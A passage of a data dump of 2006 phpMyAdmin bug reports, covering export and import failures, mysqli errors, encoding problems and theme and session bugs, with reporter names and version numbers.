gt; Original URL https sourceforge.net p phpmyadmin bugs 2074 https sourceforge.net p phpmyadmin bugs 2074 Original author zgudu Found in version 2.8.0.1","bug"
"24444","8440","PHP Fatal error with.
When i enabled from confic.inc.php mysqli comes error [Mon Mar 13 14 51 10 2006] [error] [client 192.168.0.10] PHP Fatal error Trying to clone an uncloneable object of class mysqli in C \\public html\\pma\\libraries\\dbi\\mysqli.dbi.lib.php on line 51 From php.ini extension=php mysql.dll extension=php mysqli.dll OS Windows XP APACHE 2.0.55 PHP 5.1.2 Original URL https sourceforge.net p phpmyadmin bugs 2075 https sourceforge.net p phpmyadmin bugs 2075 Original author dj02 Found in version 2.8.0.1","bug"
"24444","8441","Column expander doesn t work.
performing search on whole database getting two tables with results table A with 12 results textual link table B with 2 results buttonized link case a) click on table A textual link results are shown lt; T gt; expander link works as expected case b) click on table B button results are shown ERROR click on lt; T gt; expander link doesn t work System Server Debian 3.1 MySQL 5.0.18 PHP 4.4.2 1 Apache 2.0.55 phpMyAdmin 2.8.0.1 Client WindowsXP SP2 Firefox 1.5.0.1 Ciao, Peter Original URL https sourceforge.net p phpmyadmin bugs 2076 https sourceforge.net p phpmyadmin bugs 2076 Original author mandabaer Found in version 2.8.0.1","bug"
"24444","8442","loading binary data very slow.
This is because the query is re parsed.
I m working on this.
Original URL https sourceforge.net p phpmyadmin bugs 2077 https sourceforge.net p phpmyadmin bugs 2077 Original author lem9 Found in version 2.8.0.1","bug"
"24444","8443","pma allows import even without file uploads.
I have file uploads = Off set in my php.ini file, but phpMyAdmin ignores that setting and still offers file upload in Import dialog.
The result of course is Error You didn t enter any data to import!
.
I expect pma to NOT display the File to import fieldset, but display an error notice message instead.
This happens in pma 2.8.0.1 and CVS 2006 03 14, PHP is 5.1.2.
Original URL https sourceforge.net p phpmyadmin bugs 2078 https sourceforge.net p phpmyadmin bugs 2078 Original author ci dev Found in version Latest Git","bug"
"24444","8444","Error while parsing configuration file!.
setup.php line 1116 uses implode \n which results in Error while parsing configuration file!
Suggested fix implode This bug is triggered by any PHP lt; 4.3.0 because file get contents ) exists since PHP 4.3.0.
Original URL https sourceforge.net p phpmyadmin bugs 2079 https sourceforge.net p phpmyadmin bugs 2079 Original author julianladisch Found in version 2.8.0.1","bug"
"24444","8445","Nowrap in character sets.
server variables.php uses lt;td class= value gt; for displaying all variables, including the value for character sets .
My MySQL server has many character sets enabled, the list is 198 characters long.
The CSS makes all server variable values nowrap and right aligned so that all short values are off screen.
I need to use the horizontal scroll bar awkward.
Suggested fix Don t use nowrap for the value of character sets.
That way no horizontal scroll bar is needed.
Original URL https sourceforge.net p phpmyadmin bugs 2080 https sourceforge.net p phpmyadmin bugs 2080 Original author julianladisch Found in version 2.8.0.3","bug"
"24444","8446","Broken export to MS Excel.
When exporting to MS Excel format Temp folder defined and writable) and writing to the SaveDir folder also defined and writable) the following warnings are printed to screen Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\export\htmlexcel.php 54) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\ob.lib.php on line 61 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\export\htmlexcel.php 54) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\header http.inc.php on line 13 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\export\htmlexcel.php 54) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\export\htmlexcel.php 54) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\export\htmlexcel.php 54) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\export\htmlexcel.php 54) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\header http.inc.php on line 19 Additionally, the resulting file contains incomplete HTML.
See attachment.
I will test to see if this happens when not saving to the SaveDir folder.
Original URL https sourceforge.net p phpmyadmin bugs 2081 https sourceforge.net p phpmyadmin bugs 2081 Original author xangelusx Found in version 2.8.0.1","bug"
"24444","8447","edit breaks blob fields, changed from NULL to .
Forwarded from http bugs.debian.org cgi bin bugreport.cgi?bug=354919 Package phpmyadmin Version 4 2.7.0 pl2 1 Severity important Hi, Use this database CREATE TABLE `demo` `blobby` blob, `textty` text ) ENGINE=MyISAM DEFAULT CHARSET=latin1; INSERT INTO `demo` VALUES NULL, DUMMY ); Now edit this value using the phpmyadmin interface the following code is generated even if NO new value has been entered UPDATE `demo` SET `blobby` = WHERE CONVERT `blobby` USING utf8 ) IS NULL AND CONVERT `textty` USING utf8 ) = DUMMY LIMIT 1 ; And the result is CREATE TABLE `demo` `blobby` blob, `textty` text ) ENGINE=MyISAM DEFAULT CHARSET=latin1; INSERT INTO `demo` VALUES , DUMMY ); The NULL in blobby has become a .
There is NO possibility apart from running the sqlcode by hand) to set the field to his original null value.
This error happens if ProtectBinary is FALSE , blob and all .
Greetings Torsten Original URL https sourceforge.net p phpmyadmin bugs 2082 https sourceforge.net p phpmyadmin bugs 2082 Original author d3xter Found in version 2.8.0.1","bug"
"24444","8448","SQL subquery misleads SQL export.
Forwarded from http bugs.debian.org cgi bin bugreport.cgi?bug=351680 Package phpmyadmin Version 4 2.6.2 3sarge1 Severity normal When selecting from one single table in the SQL tab, it should be possible to export the selected data in an SQL script.
However, if the query contains a subquery, the exported data is right, but the target table for INSERT and CREATE TABLE is wrong.
Sample data to reproduce the bug Structure de la table `header1` CREATE TABLE `header1` `id header1` int 11) NOT NULL default 0 , `label` varchar 100) NOT NULL default , PRIMARY KEY `id header1`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Contenu de la table `header1` INSERT INTO `header1` VALUES 1, Chapter 1 ); INSERT INTO `header1` VALUES 2, Chapter 2 ); INSERT INTO `header1` VALUES 3, Chapter 3 ); Structure de la table `header2` CREATE TABLE `header2` `id header2` int 11) NOT NULL auto increment, `id header1` int 11) NOT NULL default 0 , `label` varchar 100) NOT NULL default , PRIMARY KEY `id header2`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Contenu de la table `header2` INSERT INTO `header2` VALUES 1, 1, Item 1.1 ); INSERT INTO `header2` VALUES 2, 1, Item 1.2 ); INSERT INTO `header2` VALUES 3, 2, Item 2.1 ); INSERT INTO `header2` VALUES 4, 2, Item 2.2 ); INSERT INTO `header2` VALUES 5, 2, Item 2.3 ); INSERT INTO `header2` VALUES 6, 3, Item 3.1 ); INSERT INTO `header2` VALUES 7, 3, Item 3.2 ); SQL query SELECT label FROM header2 h2 WHERE h2.id header1 = SELECT h1.id header1 FROM header1 h1 WHERE h1.label = Chapter 2 ); SQL export result header stripped) Structure de la table `header1` CREATE TABLE `header1` `id header1` int 11) NOT NULL default 0 , `label` varchar 100) NOT NULL default , PRIMARY KEY `id header1`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Contenu de la table `header1` INSERT INTO `header1` `id header1`, `label`) VALUES 2, Item 2.1 ); INSERT INTO `header1` `id header1`, `label`) VALUES 2, Item 2.2 ); INSERT INTO `header1` `id header1`, `label`) VALUES 2, Item 2.3 ); Expected result Structure de la table `header2` CREATE TABLE `header2` `id header2` int 11) NOT NULL auto increment, `id header1` int 11) NOT NULL default 0 , `label` varchar 100) NOT NULL default , PRIMARY KEY `id header2`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Contenu de la table `header2` INSERT INTO `header2` `id header1`, `label`) VALUES 2, Item 2.1 ); INSERT INTO `header2` `id header1`, `label`) VALUES 2, Item 2.2 ); INSERT INTO `header2` `id header1`, `label`) VALUES 2, Item 2.3 ); Original URL https sourceforge.net p phpmyadmin bugs 2083 https sourceforge.net p phpmyadmin bugs 2083 Original author d3xter Found in version 2.8.0.1","bug"
"24444","8449","Documentation.txt is badly formatted.
When viewing Documentation.txt with less or nano pico etc, the missing newlines make it hard to read.
Original URL https sourceforge.net p phpmyadmin bugs 2084 https sourceforge.net p phpmyadmin bugs 2084 Original author lnxus","bug"
"24444","8450","Fonts too large.
Compared with version 2.7.0 the fonts used in 2.8.0 are one size too large.
It is the same in IE, Firefox and Opera, all running on Windows XP.
Original URL https sourceforge.net p phpmyadmin bugs 2085 https sourceforge.net p phpmyadmin bugs 2085 Original author tonymarston Found in version 2.8.0.2","bug"
"24444","8451","socket can be empty.
The setup.php don t allow to use empty socket string if connect type is socket .
Original URL https sourceforge.net p phpmyadmin bugs 2086 https sourceforge.net p phpmyadmin bugs 2086 Original author d3xter Found in version 2.8.0.1","bug"
"24444","8452","Javascript error in new not framed) print window.
While in phpMyAdmin using Internet Explorer, if I navigate to my database and table, click on Browse , and then click Print view , a new window is opened, and before the print dialog appears, I get the following JS run time error as a popup A Runtime Error has occurred.
Do you wish to debug?
Line line 132\.
Error Object required.
I am a developer and thus I have the disable javascript errors box in IE unchecked.
Nevertheless, people should not have to uncheck that option in IE just because there is a JS problem with your code.
I notice this in phpMyAdmin 2.6.2, as well as 2.6.4.
I don t know about any of the releases after that.
Original URL https sourceforge.net p phpmyadmin bugs 2090 https sourceforge.net p phpmyadmin bugs 2090 Original author crownoflife","bug"
"24444","8453","faulty export of InnoDB with mysqli extension.
I m using MySQL 5.0.19 and PHP 5.12.
I set phpMyAdmin 2.8.0.2 to use the mysqli extension first I exported a complete mysql 5.0.19 database with InnoDB tables and several relations with the options Disable foreign key checks , Add DROP TABLE and gzipped .
when I try to import the exported db I get the following error ERROR Unknown Punctuation String 5 STR gt; SQL lt;br gt; lt;b gt;Notice lt; b gt; Undefined offset 246 in lt;b gt;C \Programme\Apache Group\Apache2\htdocs\phpMyAdmin\libraries\dbi\mysqli.dbi.lib.php lt; b gt; on line lt;b gt;395 lt; b gt; lt;br gt; .
.
.
and a lot more, always in mysqli.dbi.lib.php When I switch to mysql extersion I still cannot import, but when I do the same export with mysql extension instead and then import all is fine.
a ISAM only database exports and imports fine with mysqli.
Original URL https sourceforge.net p phpmyadmin bugs 2087 https sourceforge.net p phpmyadmin bugs 2087 Original author cmartin1970 Found in version 2.8.0.2","bug"
"24444","8454","Infinite loop on sql import.
input sql like test select 1; select 1 ; cause infinite loop in libraries import sql.php)while on Ln39 imo can be solved by replace if p5 === FALSE) with if p5 === FALSE || p5 gt;= len 2) || buffer[ p5 \ 2] gt; ) on Ln61 Original URL https sourceforge.net p phpmyadmin bugs 2088 https sourceforge.net p phpmyadmin bugs 2088 Original author martinsw Found in version 2.8.0 rc2","bug"
"24444","8455","Fresh install fails upon after config creation.
Running php 4.3.11 something.
Trying a fresh install results in a page being displayed suggesting to run the setup script.
Doing that displays an error Fatal error Call to a member function on a non object in var www phpMyAdmin 2.8.0.2 libraries common.lib.php on line 3033 there is SESSION[ PMA Theme ] = SESSION[ PMA Theme Manager ] gt;theme; if version compare phpversion ), 5 , lt )) \{ SESSION[ PMA Theme ] gt; wakeup ); \} The wakeup ) fails because gt;theme actually is an array, not an object.
[ theme ]= gt; array 3) \{ [0]= gt; string 4) left [1]= gt; string 5) right [2]= gt; string 5) print \} Original URL https sourceforge.net p phpmyadmin bugs 2089 https sourceforge.net p phpmyadmin bugs 2089 Original author neufeind Found in version 2.8.0.2","bug"
"24444","8456","CONVERT not in reserved wordlist.
ALTER TABLE tabel CONVERT TO CHARACTER SET utf8; CONVERT is not colored like other reserved words Original URL https sourceforge.net p phpmyadmin bugs 2091 https sourceforge.net p phpmyadmin bugs 2091 Original author cybot tm","bug"
"24444","8457","Wrong check for DROP DATABASE.
i have exported with phpMyAdmin to a file, and then on the import to a other database on the same server with the execute file on the server feature it breaks in the middle of the file.
if tried to cut the file in pices and have found the exact query with the problem.
when i execute this query with phpMyAdmin, i get an error like DROP DATABASE is deaktivated .
the following is a entry from a coder board with sql statments i generated with phpMyAdmin and phpMyAdmin have a problem with it.
INSERT INTO `smf messages` `ID MSG`, `ID TOPIC`, `ID BOARD`, `posterTime`, `ID MEMBER`, `ID MSG MODIFIED`, `subject`, `posterName`, `posterEmail`, `posterIP`, `smileysEnabled`, `modifiedTime`, `modifiedName`, `body`, `icon`) VALUES 99999, 477, 26, 1049834890, 113, 0, Tabelle mit nur 1 Spalte... geht nicht , Gobo , mail test.test , 99.99.99.99 , 1, 0, , Hm, der Fehler war mir vorher noch nie aufgefallen, obwohl ich fast sicher bin, bei meinen GUI Tests auch die ein oder andere Tabelle mit nur einer Spalte genutzt zu haben...\r lt;br gt;\r lt;br gt;Als ich gerade selber den Bug ansehen wollte, ist mir aber einer in der WebGUI aufgefallen im Skript index.php ist \r lt;br gt;\r lt;br gt; query = DROP DATABASE .
[b]POST [ b][ delete db ];\r lt;br gt;\r lt;br gt;zu xc3xa4ndern in\r lt;br gt;\r lt;br gt; query = DROP DATABASE .
[b]GET [ b][ delete db ];\r lt;br gt;\r lt;br gt;sonst sind Datenbanklxc3xb6schungen nicht mehr mxc3xb6glich oops , xx ); Version Informations Apache 2.0.46 Red Hat) PHP Version 4.4.0 MySQL Client API version 3.23.58 MySQL Server 4.0.20 Max Browser IE6.0 Original URL https sourceforge.net p phpmyadmin bugs 2092 https sourceforge.net p phpmyadmin bugs 2092 Original author grandslam","bug"
"24444","8458","Import Error using 2.8.0.2.
Definitively these versions 2.7 and 2.8 are really badly tested.
I found another error trying to import a file using version 2.8.0.2 I will attach TWO zip files one with five files in it to document precisely the error and one with the data used.
Document 1; Name Version264 01.jpg, Content Graphic with import using version 2.6.4 pl4 Document 2; Name Version264 02.jpg, Content Graphic with result from import using version 2.6.4 pl4 Document 3; Name Version2802 01.jpg, Content Graphic with import using version 2.8.0.2 Document 4; Name Version2802 02.jpg, Content Graphic with result using version 2.8.0.2 Document 5; Name LectManMesEle Ver2802.sql, Content File of the Table in use definition.
File LectManMesEle.zip; Content File of the records to update.
I ll wait to see what happens.
Original URL https sourceforge.net p phpmyadmin bugs 2093 https sourceforge.net p phpmyadmin bugs 2093 Original author yacar suscri","bug"
"24444","8459","Add foreign key fail on column with in name.
I ve a table with a column named Bon d achat in french) and phpmyadmin fails when trying to add a relation.
I think it s a problem of transliteration when creating the variable name.
Here is the error Notice Undefined variable Bon d\ achat on delete in W \HOME\phpmyadmin\tbl relation.php on line 147 Notice Undefined variable Bon d\ achat on delete in W \HOME\phpmyadmin\tbl relation.php on line 148 Notice Undefined index in W \HOME\phpmyadmin\tbl relation.php on line 148 Notice Undefined variable Bon d\ achat on update in W \HOME\phpmyadmin\tbl relation.php on line 150 Notice Undefined variable Bon d\ achat on update in W \HOME\phpmyadmin\tbl relation.php on line 151 Notice Undefined index in W \HOME\phpmyadmin\tbl relation.php on line 151 Original URL https sourceforge.net p phpmyadmin bugs 2097 https sourceforge.net p phpmyadmin bugs 2097 Original author mdelanno Found in version 2.8.0 rc1","bug"
"24444","8460","slow information schema retrieval.
I tried to update phpMyAdmin for www.db4free.net, which stores 4,400 databases and 87,000 tables, from 2.7.0 pl1 to 2.8.0.3.
After that, it wasn t possible to open a database anymore.
I found out that pma 2.8 makes extensive use of information schema and I guess that that s the cause of the problem.
Original URL https sourceforge.net p phpmyadmin bugs 2099 https sourceforge.net p phpmyadmin bugs 2099 Original author mpopp75 Found in version 2.8.0.3","bug"
"24444","8461","auto increment lost on MYSQL323 and 40 compatibility.
Running MySQL 5.0.18 nt on a Windows XP box with PHP 4.4.2.
When running an export on, for example, this table CREATE TABLE `adminusers` `id` mediumint 8) unsigned NOT NULL auto increment, `fullname` varchar 60) NOT NULL default , `username` varchar 20) NOT NULL default , `pass` varchar 32) NOT NULL default , `email` varchar 200) NOT NULL default , PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; Setting export compatibility tot MYSQL323 or MYSQL40 produces the following query CREATE TABLE `adminusers` `id` mediumint 8) unsigned NOT NULL, lt;==== ???
`fullname` varchar 60) NOT NULL default , `username` varchar 20) NOT NULL default , `pass` varchar 32) NOT NULL default , `email` varchar 200) NOT NULL default , PRIMARY KEY `id`) ) TYPE=MyISAM; When I check Add AUTO INCREMENT value it produces CREATE TABLE `adminusers` `id` mediumint 8) unsigned NOT NULL, lt;==== ???
`fullname` varchar 60) NOT NULL default , `username` varchar 20) NOT NULL default , `pass` varchar 32) NOT NULL default , `email` varchar 200) NOT NULL default , PRIMARY KEY `id`) ) TYPE=MyISAM AUTO INCREMENT=2 ; Because there are 2 rows in there, so the AUTO INCREMENT value is correct, but the AUTO INCREMENT attribute still isn t added.
So this must clearly be a small bug.
I haven t been able to find what the problem is yet, but I think you guys can find the problem alot faster than me anyway. )
I haven t checked other compatibility modes, but the regular NONE is fine.
Original URL https sourceforge.net p phpmyadmin bugs 2094 https sourceforge.net p phpmyadmin bugs 2094 Original author meangry Found in version 2.8.0.2","bug"
"24444","8462","Copy a db containing a VIEW.
The current logic replaces the first quote backtick by the new db table; this works for a CREATE TABLE definition but not for a VIEW definition.
Original URL https sourceforge.net p phpmyadmin bugs 2095 https sourceforge.net p phpmyadmin bugs 2095 Original author lem9 Found in version 2.8.0.2","bug"
"24444","8463","Undef offs, tbl properties.inc.php, lines 229, 350.
MySQL 5.0.18 phpMyAdmin 2.8.0.2 PHP 4.4.2 I wanted to change a column from `r2` enum and , or ) NOT NULL default and to `r2` enum AND , OR ) NOT NULL default AND by means of table structure click on change column pencil icon) In field Length Value I improperly entered AND, OR single quote behind AND is missing) and got a) SQL Error ERROR Unclosed quote 121 ok, mea culpa) b) two PHP Errors Notice Undefined offset 1 in phpMyAdmin 2.8.0.2 libraries tbl properties.inc.php on line 229 Notice Undefined offset 0 in phpMyAdmin 2.8.0.2 libraries tbl properties.inc.php on line 350 Peter Original URL https sourceforge.net p phpmyadmin bugs 2096 https sourceforge.net p phpmyadmin bugs 2096 Original author mandabaer Found in version 2.8.0.2","bug"
"24444","8464","cfg[ TextareaRows ] does not take effect.
The variable cfg[ TextareaRows ] does not set the textarea rows at all.
It extends the entire field set vertically when the number is higher but the number of rows in the textarea field query window and sql tab screens) remains the same.
I m guessing your dhtml is resetting the height of the box while trying to stretch it horizontally.
Original URL https sourceforge.net p phpmyadmin bugs 2098 https sourceforge.net p phpmyadmin bugs 2098 Original author luegner Found in version 2.8.0.3","bug"
"24444","8465","Error message uninformative when file too big.
I tried importing an SQL dump file, and got the following message You didn t enter any data to import!
The problem turned out to be that the file was slightly too big 2.1MB exceeding the 2.0MB limit).
It d be better if the error said something more appropritate to make it easier to troubleshot like file size exceeds limit.
Perhaps you could even mention where this limit is specified in upload max filesize and or post max size in php.ini not sure which one).
Using phpMyAdmin 2.7.0 pl2 PHP Version 4.4.1 MySQL 4.1.7 standard Mac OS X 10.3.9 Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 2103 https sourceforge.net p phpmyadmin bugs 2103 Original author jerdonek","bug"
"24444","8466","Access denied with generated configuration file.
Hi, I just installed 2.8.0.3.
Now I always get an error 1045 Access denied for user root localhost using password NO) .
These are the ways tried to get a working config.inc.php 1\.
Copy it form my working 2.7.0 pl1 installation.
2\.
Copy it from my working 2.7.0 pl1 installation to config config.inc.php and use scripts setup.php to look for necessary changes.
Save it and copy it from config to Both files do look ok for me.
Original URL https sourceforge.net p phpmyadmin bugs 2100 https sourceforge.net p phpmyadmin bugs 2100 Original author ghermens Found in version 2.8.0.3","bug"
"24444","8467","Version number doesn t change after update.
I did the following Accessed my PMA 2.8.0.2 installation Upgraded to 2.8.0.3 Accessed my PMA again And I was surprised that the version number displayed on the web page was still 2.8.0.2.
It took me some time to figure out what was wrong.
First I had to convince myself that the directory I had updated was indeed the document root my server was pointing at.
Then I scoured the source code, reassuring myself that the 2.8.0.3 version number was indeed in the source.
I cleared my browser s cache, I thought my web server might be caching something so I restarted it, but nothing helped.
I finally came up with the following explanation for the problem since 2.8.0, PMA stores the version number in the configuration object, which it stores in the session.
In the Config class, in the wakeup function, we see that it only calls checkSystem which sets the version number) under certain circumstances which I haven t deciphered yet but which are not being met in my case.
So the old config object from the session is being reused, hence the version number was not updating in the web interface.
Moving the checkSystem call out of the if block and reloading the page updated the version number.
I m not sure what the best solution is, but it would certainly be clearer if the version number shown in the interface would update immediately after a sysadmin upgrades PMA, and not wait until a user s session expires.
Not sure what else is going into the session; perhaps it would make sense to dump the entire session when PMA detects that the version has been upgraded, possibly even forcing the user to log in again.
Original URL https sourceforge.net p phpmyadmin bugs 2101 https sourceforge.net p phpmyadmin bugs 2101 Original author ryandesign Found in version 2.8.0.3","bug"
"24444","8468","Error removing default value.
It appears that bug 1406378 has resurfaced.
Steps to reproduce 1\.
Create a table with an INT NOT NULL column and a default value.
2\.
Edit the structure of that column to remove the default value.
Actual result SQL query ALTER TABLE `faq topics` CHANGE `cat` `cat` INT 10 ) UNSIGNED NOT NULL DEFAULT MySQL said 1067 Invalid default value for cat Desired result ALTER TABLE `faq topics` CHANGE `cat` `cat` INT 10 ) UNSIGNED NOT NULL Interestingly, if you go ahead and click Save again on the error page without changing anything shown, the query goes through exactly as shown in Desired result and everything is fine.
Original URL https sourceforge.net p phpmyadmin bugs 2102 https sourceforge.net p phpmyadmin bugs 2102 Original author mwhitlock Found in version 2.8.0.3","bug"
"24444","8469","Error message when choosing Galego Galician .
I got this error when using language Galego Galician both) with 2.8.0.3 version Parse error syntax error, unexpected T VARIABLE in ....galician utf 8.inc.php on line 847 On both php files, galician utf 8.inc.php and galician iso 8859 1.inc.php, a ; is missing on lines 845 and 846 Sincerly yours kiki2sirom Original URL https sourceforge.net p phpmyadmin bugs 2104 https sourceforge.net p phpmyadmin bugs 2104 Original author kiki2sirom Found in version 2.8.0.3","bug"
"24444","8470","PMA backquote ) issues.
` backquote or backtick) inside names is not escaped arrays are not handled correctly empty names or where not respected Original URL https sourceforge.net p phpmyadmin bugs 2107 https sourceforge.net p phpmyadmin bugs 2107 Original author cybot tm Found in version 2.8.0","bug"
"24444","8471","Problem exporting table with blog fields and Spanish.
This was tested with versions 2.6.4.pl1, 2.6.4.pl2, 2.8.0.2 and 2.8.0.3 There are problems depending on the configuration of the parameter cfg[ AllowAnywhereRecoding ].
I HAVE TO set this parameter to true because I m a Spanish speaking person and my customers use Spanish in the content of their databases.
If you try to export import data from to a table with PMA) that uses fields defined as BLOB then you are in BIG TROUBLE.
Bellow there is a detailed explanation of the problems I found when the option is set to either of the options, true or false 1st.
Case Export data as a SQL file Set the cfg[ AllowAnywhereRecoding ] to FALSE In this case the file has all the accented characters or the tilde characters like xc3x91 xc3xb1) translated into weird things.
Set the cfg[ AllowAnywhereRecoding ] to TRUE After the download is complete the output file DOES NOT in certain cases, see note at the end) contain the whole set of fields defined for the table.
In this case, and after fixing manually the records that were not complete, when you try to upload import) the data back to the file which is empty) you get an error that displays the data for the first record and at the end the message xe2x80x9cxe2x80x9c 1062 Duplicate entry 2003 1 for key 1xe2x80x9dxe2x80x9d.
2nd.
Case Export data as a LaTeX file Set the cfg[ AllowAnywhereRecoding ] to FALSE I really donxe2x80x99t know which the format for this kind of file is but the size of the resulting file is very small.
Set the cfg[ AllowAnywhereRecoding ] to TRUE The output file is very small and looking into it you find only the definition of the table fields plus ONLY one record that does not seem to be complete.
3rd.
Case Export data as a Pdf file Set the cfg[ AllowAnywhereRecoding ] to FALSE After a very long time, it takes forever, the size of the resulting file is very small and xe2x80x93logically when you try to open it in the reader you get a message back stating that the file is bad.
Set the cfg[ AllowAnywhereRecoding ] to TRUE Also like stated before, after a very long time, it takes forever, the size of the resulting file is very small and xe2x80x93logically when you try to open it in the reader you get a message back stating that the file is bad.
4th.
Case Export data as a Microsoft Excel 2000 file Set the cfg[ AllowAnywhereRecoding ] to FALSE The Resulting file could not be opened either in Excel nor OpenOffice.org.calc they get cancelled).
Set the cfg[ AllowAnywhereRecoding ] to TRUE The file is very small, I could open it using both Excel and OpenOffice.org.calc and only has the data up to but not including) the first blob field.
5th.
Case Export data as a Microsoft Word 2000 file Set the cfg[ AllowAnywhereRecoding ] to FALSE The Resulting file could not be opened either in Excel nor OpenOffice.org.writer they get cancelled).
Set the cfg[ AllowAnywhereRecoding ] to TRUE The file is very small, I could open it using both Word and OpenOffice.org.writer and only has the data up to but not including) the first blob field.
6th.
Case Export data as a CSV for MS Excel file Set the cfg[ AllowAnywhereRecoding ] to FALSE The Resulting file is very small, has all the records, the blob fields are not exported and the accented or special characters are wrong.
Set the cfg[ AllowAnywhereRecoding ] to TRUE The file is very small, has all the records in just one line and the data is up to but not including) the first blob field.
7th.
Case Export data as a CSV file Set the cfg[ AllowAnywhereRecoding ] to FALSE The Resulting file seems to be correct BUT, when you try to import back the data to the table you get a message back from PMA stating xe2x80x9cxe2x80x9cInvalid field count in CSV input on line 1xe2x80x9dxe2x80x9d.
Set the cfg[ AllowAnywhereRecoding ] to TRUE The file is very small, has all the records in just one line and the data is up to but not including) the first blob field.
NOTE CONCERNING TEXT FIELDS WITH SOME SPECIAL CHARACTERS THIS IS VERY STRANGE In the table there is one field which contents is something plus Montoya ) that is blank short dash NOT DASH the word Montoya short dash NOT DASH blank), in this case the record gets truncated after the first dash and there is no more data for that record.
Strange no).
One more thing, if you do an edit of this record you will notice that the two SHORT DASHES are not shown.
Also if you use the Ellipsis) character, the record also gets truncated up to but not including the ellipsis.
NOTE CONCERNING IExplorer HTML WARNINGS.
After the execution of any option within the export screen) if you try to select another option and you have set the options to debug HTML errors) you get an error and, to be able to redo the command with another option, you have to reload the page.
The error is something like xe2x80x9cThere has occurred an error at execution time, do you want to debug it?xe2x80x9d my translation.
This error does not show using Firefox.
Some more clarification of my problems.
Please note that if you go to the bellow link, youxe2x80x99ll be able to see the record content for the problem about Montoya ), and you can notice that the short dash are well displayed.
http www.websprogrammer.com WebsProgrammer F1 F1DetailCircuit.php?Year=2006 Circuit=16 If you want a result of the different exported files just go to this link http www.websprogrammer.com PmaProblems ExportProblem.zip The file will be there till April 18, 2006 I suppose 8 days is enough time for you to get it.
Each of the zipped files has a name in accordance with the selected option for the export operation intended.
Original URL https sourceforge.net p phpmyadmin bugs 2106 https sourceforge.net p phpmyadmin bugs 2106 Original author yacar suscri Found in version 2.8.0.3","bug"
"24444","8472","missing property in Theme Manager class.
property Theme Manager theme default is not defined Original URL https sourceforge.net p phpmyadmin bugs 2108 https sourceforge.net p phpmyadmin bugs 2108 Original author cybot tm Found in version 2.8.0","bug"
"24444","8473","config changes not accepted in theme manager.
If themes configuration has changed in config.inc.php, the Theme Manager does not recognice this, as this was tried to be handled by wakeup ), but when this is called on PHP5 on session start )) there is no GLOBALS[ cfg ].
Original URL https sourceforge.net p phpmyadmin bugs 2109 https sourceforge.net p phpmyadmin bugs 2109 Original author cybot tm Found in version 2.8.0","bug"
"24444","8474","endless redirect in sql.php as default table page.
hallo versions mysql 5.0.19 php 5.1.2 apache 2.0.55 running as module) firefox 1.5.0.1 windows xp, sp2 in the configuration i set cfg[ DefaultTabTable ] = sql.php ; show the browse page for tables) if i then click on the table in the left frame), but the table is emtpy, firefox will terminate the request with the message redirect limit is reached firefox german error message Fehler Umleitungsfehler Die aufgerufene Website leitet die Anfrage so um, dass sie nie beendet werden kann.
Dieses Problem kann manchmal auftreten, wenn Cookies deaktiviert oder abgelehnt werden.
the internet explorer v6) does show the structure page but it takes 2 3 minutes.
since this is not the default config, i assume its not that urgent.
thanks a lot ) Original URL https sourceforge.net p phpmyadmin bugs 2110 https sourceforge.net p phpmyadmin bugs 2110 Original author ossipetz Found in version 2.8.0.3","bug"
"24444","8475","Can t create store procedure.
When running below sql query in PHPmyadmin DELIMITER CREATE PROCEDURE `procedurename` ) BEGIN SELECT FROM tablename; END DELIMITER ; SQL syntax error Below query doesn t work also CREATE PROCEDURE `procedurename` ) BEGIN SELECT FROM tablename; END; Original URL https sourceforge.net p phpmyadmin bugs 2111 https sourceforge.net p phpmyadmin bugs 2111 Original author biggio Found in version 2.8.0.3","bug"
"24444","8476","undef cfgRelation.
server OS Linux Debian 3.1 webserver Apache 2.0.55 PHP Version 5.1.2 Apache 2.0 Handler) DB server MySQL 5.0.19 pma phpMyAdmin 2.8.0.3 client OS WindowsXP SP2 browser FireFox 1.5.0.1 I can t provoke the error now, but I found in my logs the following pieces Apache log [13 Apr 2006 12 03 06 0200] POST phpMyAdmin 2.8.0.3 import.php HTTP 1.1 [13 Apr 2006 12 03 06 0200] GET phpMyAdmin 2.8.0.3 css phpmyadmin.css.php?server=2 js frame=right HTTP 1.1 200 21457 PHP log; [13 Apr 2006 12 03 06 0200] PHP Notice Undefined index cfgRelation in phpMyAdmin 2.8.0.3 libraries footer.inc.php on line 42 Peter Original URL https sourceforge.net p phpmyadmin bugs 2112 https sourceforge.net p phpmyadmin bugs 2112 Original author mandabaer Found in version 2.8.0.3","bug"
"24444","8477","PMA blowfish decrypt.
Hello, I maintain a web cluster, with Debian i386 and Debian AMD64 nodes it was an urgency case...), and PHP was not loading the mcrypt extension, so the Horde Cipher blowfish ) was used.
The problem a password encrypt on an AMD64 node can t be decrypt on an i386 node.
And if encrypt on an i386 it can t be decrypt on an AMD64, of course.
So I install the mcrypt extension of PHP and it solve the problem, for me.
Original URL https sourceforge.net p phpmyadmin bugs 2113 https sourceforge.net p phpmyadmin bugs 2113 Original author kioob Found in version 2.7.0 pl2","bug"
"24444","8478","Config File Not Being Read.
